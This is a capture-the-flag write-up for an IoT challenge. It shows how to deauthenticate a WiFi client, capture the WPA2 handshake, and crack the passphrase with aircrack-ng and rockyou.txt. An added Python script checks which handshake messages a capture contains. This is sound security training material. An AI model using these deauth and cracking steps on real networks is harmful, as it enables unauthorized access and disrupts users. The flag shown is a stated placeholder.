ESPILON-CTF-2026-Writeups/IoT/Cr4cK_w1f1/README.md

Cr4cK_W1F1

| Field | Value |
|---|---|
| Category | IoT |
| Difficulty | Medium |
| Points | TBD |
| Author | Eun0us |
| CTF | Espilon 2026 |

Description

You recover UART access to a red-team WiFi sniffer tool. Analyze the captured data to recover the WiFi password, then connect to the network and retrieve the flag.

  • TX (read UART): port 1111
  • RX (write UART): port 2222

TL;DR

Use the sniffer to force a WPA2 4-way handshake and capture it, extract the base64-encoded PCAP from the UART output, crack the handshake with aircrack-ng and rockyou.txt to recover the passphrase sunshine, then connect to the network and read the flag.


Tools

| Tool | Purpose |
|---|---|
| nc | Connect to the UART TX/RX ports |
| base64 | Decode the PCAP blob |
| aircrack-ng | Crack the WPA2 handshake |
| rockyou.txt | Password wordlist |

Solution

📸 [image: hashcat cracking WPA handshake]

Step 1 — Open both UART channels

# Terminal 1 — TX (read output)
nc <host> 1111

# Terminal 2 — RX (send commands)
nc <host> 2222

📸 [screenshot: two terminals showing TX output and RX prompt]

Step 2 — Start the sniffer and force a deauth

In the RX terminal:

sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop

The deauthentication frame kicks the target client off TestNet; when it reconnects it performs a fresh WPA2 4-way handshake, and the running sniffer records the EAPOL frames. Keep the sniffer running until the client has reassociated: if you stop it too early, the capture will not contain a usable handshake and the deauth has to be repeated.

Step 3 — Extract the PCAP from TX

On the TX terminal, output appears between markers:

PCAP_BASE64_BEGIN
<base64 data>
PCAP_BASE64_END

Copy the base64 lines between the two markers (without the marker lines themselves) into handshake.b64 and decode:

base64 -d handshake.b64 > handshake.pcap

📸 [screenshot: TX output showing the PCAP_BASE64 markers]

Step 4 — Crack the WPA2 handshake

aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap

-b selects the target BSSID. If aircrack-ng reports no handshake for it, the capture is missing EAPOL messages: start the sniffer again and repeat the deauth. If the capture contains no beacon for TestNet, pass the ESSID explicitly with -e TestNet, since the PMK is derived from the passphrase with the SSID as salt and aircrack-ng cannot test candidates without it.

Output:

KEY FOUND! [ sunshine ]

📸 [screenshot: aircrack-ng finding the key]
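Steps 3 and 4 both depend on the decoded blob actually containing a usable handshake. The script below is an added example, not code from the original writeup or from the challenge author: it decodes the blob from a saved TX log and reports, per BSSID, which of the four EAPOL-Key messages the capture holds, so you know before running aircrack-ng whether another deauth is needed. It assumes the TX output was saved to a file (for instance `nc <host> 1111 | tee tx.log`), that the blob is a classic pcap with raw 802.11 (link type 105) or radiotap (127) frames, and, for its built-in constructed sample, that 02:00:00:10:00:01 is the AP and 02:00:00:aa:00:01 is the client; the sample frames are constructed test data, not traffic from the challenge.

```python
#!/usr/bin/env python3
"""Decode the base64 PCAP from a saved UART TX log and check which EAPOL-Key
messages of the WPA2 4-way handshake it holds. Added example; the sample frames
and the AP/client roles of the two addresses below are assumptions."""
import base64
import struct
import sys

BEGIN, END = "PCAP_BASE64_BEGIN", "PCAP_BASE64_END"
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header, ethertype 0x888e

def extract_blob(tx_text: str) -> bytes:
    """Decode the base64 lines strictly between the BEGIN/END markers."""
    lines = [l.strip() for l in tx_text.splitlines()]
    start = lines.index(BEGIN) + 1
    return base64.b64decode("".join(lines[start:lines.index(END, start)]), validate=True)

def pcap_records(data: bytes):
    """Yield (linktype, packet) for each record of a classic (non-pcapng) pcap."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None:
        raise ValueError(f"not a classic pcap, magic {data[:4].hex()}")
    linktype, off = struct.unpack(endian + "I", data[20:24])[0], 24
    while off + 16 <= len(data):
        incl = struct.unpack(endian + "I", data[off + 8:off + 12])[0]
        yield linktype, data[off + 16:off + 16 + incl]
        off += 16 + incl

def eapol_key_message(linktype: int, pkt: bytes):
    """Return (bssid, message number 1-4) for a pairwise EAPOL-Key frame, else None."""
    if linktype == 127 and len(pkt) >= 4:              # radiotap: skip its header
        pkt = pkt[struct.unpack("<H", pkt[2:4])[0]:]
    elif linktype != 105:                              # 105 = raw 802.11
        return None
    if len(pkt) < 24 or ((pkt[0] >> 2) & 3) != 2:      # frame type 2 = data
        return None
    to_ds, from_ds, qos = pkt[1] & 1, pkt[1] & 2, pkt[0] & 0x80
    hdr = 24 + (6 if to_ds and from_ds else 0) + (2 if qos else 0)   # addr4, QoS control
    eapol = pkt[hdr + 8:]
    if pkt[hdr:hdr + 8] != LLC_SNAP_EAPOL or len(eapol) < 99 or eapol[1] != 3:
        return None                                    # EAPOL type 3 = Key
    a1, a2, a3 = pkt[4:10], pkt[10:16], pkt[16:22]
    bssid = a2 if from_ds else a1 if to_ds else a3
    key_info = struct.unpack(">H", eapol[5:7])[0]      # big-endian Key Information field
    if not key_info & 0x0008:                          # bit 3: pairwise key
        return None
    ack, mic = key_info & 0x0080, key_info & 0x0100
    key_data_len = struct.unpack(">H", eapol[97:99])[0]
    if ack:
        msg = 3 if mic else 1                          # AP -> STA: M1 has no MIC, M3 does
    else:
        msg = 2 if key_data_len else 4                 # STA -> AP: M2 carries the RSN IE, M4 is empty
    return ":".join(f"{b:02x}" for b in bssid), msg

def handshake_status(pcap: bytes) -> dict:
    """Map each BSSID to the set of handshake messages present in the capture."""
    seen = {}
    for linktype, pkt in pcap_records(pcap):
        hit = eapol_key_message(linktype, pkt)
        if hit:
            seen.setdefault(hit[0], set()).add(hit[1])
    return seen

def crackable(msgs: set) -> bool:
    """aircrack-ng needs M2 (SNonce + MIC) plus the ANonce from M1 or M3."""
    return 2 in msgs and (1 in msgs or 3 in msgs)

def _eapol_frame(ap: bytes, sta: bytes, from_ds: bool, key_info: int, key_data: bytes) -> bytes:
    """Constructed 802.11 data frame carrying one EAPOL-Key message (test data only)."""
    addrs = sta + ap + ap if from_ds else ap + sta + ap
    hdr = bytes([0x08, 0x02 if from_ds else 0x01]) + b"\x00\x00" + addrs + b"\x00\x00"
    body = (b"\x02" + struct.pack(">H", key_info) + b"\x00\x10" + bytes(88)   # zeroed nonce/IV/MIC
            + struct.pack(">H", len(key_data)) + key_data)
    return hdr + LLC_SNAP_EAPOL + b"\x02\x03" + struct.pack(">H", len(body)) + body

def build_sample_pcap(messages=(1, 2, 3, 4)) -> bytes:
    """Constructed pcap (link type 105) holding the chosen handshake messages."""
    ap, sta = bytes.fromhex("020000100001"), bytes.fromhex("020000aa0001")   # assumed roles
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    spec = {1: (True, 0x008a, b""), 2: (False, 0x010a, rsn_ie),
            3: (True, 0x13ca, rsn_ie), 4: (False, 0x030a, b"")}
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    for n in messages:
        frame = _eapol_frame(ap, sta, *spec[n])
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out

def sample_tx_log() -> str:
    """Constructed UART transcript in the shape the challenge prints."""
    b64 = base64.encodebytes(build_sample_pcap()).decode()
    return f"sniffer started\n{BEGIN}\n{b64}{END}\nsniffer stopped\n"

if __name__ == "__main__":
    real = len(sys.argv) == 3                          # usage: check_handshake.py tx.log handshake.pcap
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if real else sample_tx_log()
    blob = extract_blob(text)
    if real:
        open(sys.argv[2], "wb").write(blob)
    for bssid, msgs in handshake_status(blob).items():
        print(f"{bssid}: messages {sorted(msgs)} -> {'crackable' if crackable(msgs) else 'incomplete'}")
```

Run it as `python3 check_handshake.py tx.log handshake.pcap` on the real log; with no arguments it runs on the constructed sample. aircrack-ng prints a handshake count per network when given the capture alone, but this shows which message is missing, which tells you whether the deauth landed at all (no M1) or the sniffer stopped too early (M1 only). M2 and M4 are told apart by whether the key data field is empty rather than by the Secure bit, so the check does not depend on the descriptor type.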

Step 5 — Connect and read the flag

In the RX terminal:

connect TestNet sunshine
cat /flag.txt

📸 [screenshot: RX terminal returning the flag after connecting to the network]


Flag

CTF{CR4CK_W1F1_EXAMPLE}

Note: This challenge was still being finalized at time of writing. The flag above is a placeholder; the real flag will be updated before deployment.